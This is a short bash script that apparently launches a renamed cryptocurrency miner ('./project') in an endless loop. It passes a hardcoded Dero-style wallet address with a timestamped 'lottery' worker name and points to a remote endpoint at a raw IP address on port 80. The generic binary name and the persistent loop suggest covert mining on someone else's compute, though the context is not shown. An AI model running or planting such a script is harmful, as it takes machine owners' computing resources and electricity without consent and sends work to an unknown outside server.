#!/bin/bash
while [ 1 ]; do 
./project -w deroi1qyzlxxgq2weyqlxg5u4tkng2lf5rktwanqhse2hwm577ps22zv2x2q9pvfz92xc0v2j0vsquftksu2ayrl.$(echo lottery-$(TZ=UTC-7 date +"%d-%m-%a-%H:%M:%S")) -r 149.129.237.206:80 -p rpc
sleep 3
done 
sleep 999
